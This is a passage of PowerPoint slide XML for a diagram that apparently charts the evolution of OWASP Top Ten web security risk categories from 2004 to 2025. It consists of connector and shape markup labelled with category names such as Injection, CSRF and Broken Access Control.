          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2416680" y="4891860"/>
            <a:ext cx="349200" cy="100296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stealth" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1260" name="Connector: Curved 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0DC4DD6-ECCB-5B70-25D7-5DCB4E5785FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1208" idx="3"/>
            <a:endCxn id="1191" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1151640" y="1429200"/>
            <a:ext cx="334080" cy="1488960"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 54045"/>
              <a:gd name="adj2" fmla="val 49987"/>
              <a:gd name="adj3" fmla="val 4617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1" name="Connector: Curved 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4FB73CA-DF0E-413D-820A-D59783988919}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1217" idx="3"/>
            <a:endCxn id="1197" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1151640" y="1924020"/>
            <a:ext cx="333360" cy="198612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3" name="Connector: Curved 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C556794-B6C5-C63D-73C1-10C64CB37353}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1223" idx="3"/>
            <a:endCxn id="1204" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2416680" y="2418660"/>
            <a:ext cx="349200" cy="1987560"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33106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64" name="Connector: Curved 88">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14CF44AE-AFC5-A60E-6B55-FDD968E32EA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1226" idx="3"/>
            <a:endCxn id="1216" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4966560" y="3414060"/>
            <a:ext cx="359280" cy="99216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5" name="Connector: Curved 89">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31F5E179-7887-28DA-765F-968BA989B9AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1220" idx="3"/>
            <a:endCxn id="1205" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4966560" y="2421360"/>
            <a:ext cx="359640" cy="1488960"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50100"/>
              <a:gd name="adj2" fmla="val 49987"/>
              <a:gd name="adj3" fmla="val 49899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6" name="Connector: Curved 90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{684F84F6-CE48-F438-8AAD-1C430C8BE549}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1241" idx="3"/>
            <a:endCxn id="1237" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6251760" y="5398740"/>
            <a:ext cx="34164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67" name="Straight Arrow Connector 91">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{122A48F9-AE30-715E-F1A9-AF5CE5BF2771}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3647160" y="143370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68" name="Straight Arrow Connector 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA6B37BB-3324-CD1C-B8F7-8EC75659F099}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4914000" y="1934640"/>
            <a:ext cx="40752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70" name="Straight Arrow Connector 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12456F32-C2A4-4A0F-27A5-0D65027CB53F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074960" y="4901760"/>
            <a:ext cx="40716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71" name="Straight Arrow Connector 96">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3DBD1ED-7A01-3DCE-9956-4046A687654E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3628080" y="2913480"/>
            <a:ext cx="40716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72" name="Straight Arrow Connector 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBAB589A-2329-C6E3-F309-EA546D00144A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2358720" y="2913480"/>
            <a:ext cx="40752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73" name="Straight Arrow Connector 98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E165505-28AD-EEB1-6869-BEC7FF62CF7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1214" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2416680" y="3414060"/>
            <a:ext cx="362880" cy="198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75" name="Straight Arrow Connector 100">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12595D28-E0BF-F4AA-B8CD-BA00C5D36B65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="1193" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4889340" y="1428840"/>
            <a:ext cx="436500" cy="54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6" name="Connector: Curved 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60761449-82EA-F94C-A669-D4FA976C8592}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1222" idx="3"/>
            <a:endCxn id="1218" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1173600" y="3910140"/>
            <a:ext cx="31212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7" name="Straight Arrow Connector 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51C823DC-9A1C-7BC8-0D22-5BEC7E7FD517}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6199920" y="4888080"/>
            <a:ext cx="40752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78" name="Straight Arrow Connector 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E183CBD-3652-AAE4-3CA9-351B48EA6F8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2369160" y="5367600"/>
            <a:ext cx="40752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80" name="Connector: Curved 105">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7719A30-3F78-BFDC-2878-D9CB7E534388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1215" idx="3"/>
            <a:endCxn id="1311" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3695400" y="3407940"/>
            <a:ext cx="343440" cy="149472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82" name="Connector: Curved 107">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07F74115-680B-BA27-0F32-72312B6F47EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1205" idx="3"/>
            <a:endCxn id="1201" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6251760" y="1925460"/>
            <a:ext cx="34164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84" name="Connector: Curved 109">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21A7708E-7CBD-AEF1-FAC4-59E6321D25F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1244" idx="3"/>
            <a:endCxn id="1247" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6265440" y="2920860"/>
            <a:ext cx="325440" cy="493200"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 52266"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1285" name="Connector: Curved 110">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49B6EA40-02DE-670D-4CFD-66CF6892E8C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1246" idx="3"/>
            <a:endCxn id="1247" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6269040" y="3414060"/>
            <a:ext cx="32184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808080">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1287" name="Connector: Curved 112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61D1E678-E7BD-3275-9D1A-0A74637057EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1245" idx="3"/>
            <a:endCxn id="1246" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4967640" y="3414060"/>
            <a:ext cx="37188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sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1288" name="Straight Arrow Connector 113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F061A101-D190-9354-AAF3-10C39F308FD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2383560" y="3899160"/>
            <a:ext cx="39564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sp>
        <p:nvSpPr>
          <p:cNvPr id="1292" name="CustomShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{194D4470-29B9-D1A5-483E-76C77A292EEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7882200" y="1220040"/>
            <a:ext cx="93348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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Broken Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" strike="noStrike" spc="-1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93" name="CustomShape 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8046291A-7843-B300-6A3A-352ADC845A63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="269100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Cryptographic Failures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94" name="CustomShape 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{931DE835-5A7B-EB8F-B82B-2B38F0BA7120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="3683160"/>
            <a:ext cx="933480" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:srgbClr val="92D050"/>
            </a:fgClr>
            <a:bgClr>
              <a:srgbClr val="E4E4E4"/>
            </a:bgClr>
          </a:patt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Insecure </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1000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Design</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="0" strike="noStrike" spc="-1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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95" name="CustomShape 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{226D6546-60C7-B0FE-9C8A-10AF437449A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="219456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Software Supply Chain Failures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96" name="CustomShape 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4E1C992-A833-80C6-B873-F2A9A5DFD00F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="4179240"/>
            <a:ext cx="93348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Authentication Failures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97" name="CustomShape 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14ACBBC6-21D8-82A1-AFB7-AB52531F1177}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="467568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Software &amp; Data Integrity Failures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98" name="CustomShape 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B85B6A86-5584-62E6-BA94-7E573135C1C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="5171760"/>
            <a:ext cx="93348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Yu Mincho Demibold"/>
              </a:rPr>
              <a:t> Logging &amp; Alerting Failures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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299" name="CustomShape 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9F61BDF-EBC7-E41E-99D9-2762B3457F14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875000" y="566784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Mishandling Exceptional Conditions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300" name="CustomShape 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87331064-73FC-A1E9-B7CC-AF8FE98AD0E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7872120" y="1698480"/>
            <a:ext cx="938880" cy="4186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36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Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" strike="noStrike" spc="-1" dirty="0" err="1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Misconfig</a:t>
            </a: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.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" strike="noStrike" spc="-1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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301" name="Straight Arrow Connector 126">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B56CF6F-605A-DAF7-D676-F42512301746}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1195" idx="3"/>
            <a:endCxn id="1292" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7517880" y="1429200"/>
            <a:ext cx="36468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sp>
        <p:nvSpPr>
          <p:cNvPr id="1302" name="CustomShape 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F422D628-A9B9-2FA3-DDC7-B44E76761AC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6588720" y="4693320"/>
            <a:ext cx="933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900" b="1" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Software &amp; Data Integrity Failures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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</p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1303" name="Straight Arrow Connector 136">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D77F91E-8FE1-8868-867D-75E88C342748}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7462080" y="5381280"/>
            <a:ext cx="40356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sp>
        <p:nvSpPr>
          <p:cNvPr id="1305" name="CustomShape 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A233AF9-984E-2CBD-5CE4-A7833BDFBBA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7879320" y="3187080"/>
            <a:ext cx="924480" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCCC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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" strike="noStrike" spc="-1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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306" name="Straight Arrow Connector 160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7962F28-F57B-4B23-191A-0FE5710BB5D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481160" y="4365000"/>
            <a:ext cx="40356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307" name="Connector: Curved 168">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{375339F1-6213-F064-B3BA-A2A248F1D8D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1212" idx="3"/>
            <a:endCxn id="1294" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7517880" y="2917980"/>
            <a:ext cx="357120" cy="974520"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:lumMod val="85000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1308" name="Straight Arrow Connector 169">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A3CD479-9F56-6D45-A418-029B3ACE98A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="1297" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7517160" y="4884840"/>
            <a:ext cx="358200" cy="360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sp>
        <p:nvSpPr>
          <p:cNvPr id="1309" name="TextBox 188">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{581A74F0-2423-4972-F613-C9A050A461A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384480" y="957600"/>
            <a:ext cx="8374680" cy="275545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="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0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>2004                        2007                        2010                         2013                       2017                         2021                        2025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1" name="CustomShape 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD20D3DF-BE12-CA03-1B4F-130FF8F6B796}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="4693320"/>
            <a:ext cx="927720" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D05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en-US" sz="1000" b="1" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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</p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1312" name="Connector: Curved 163">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE146C78-0828-81CF-63E4-E5E74EBEC692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1247" idx="3"/>
            <a:endCxn id="1300" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7520400" y="1907640"/>
            <a:ext cx="352080" cy="1506600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
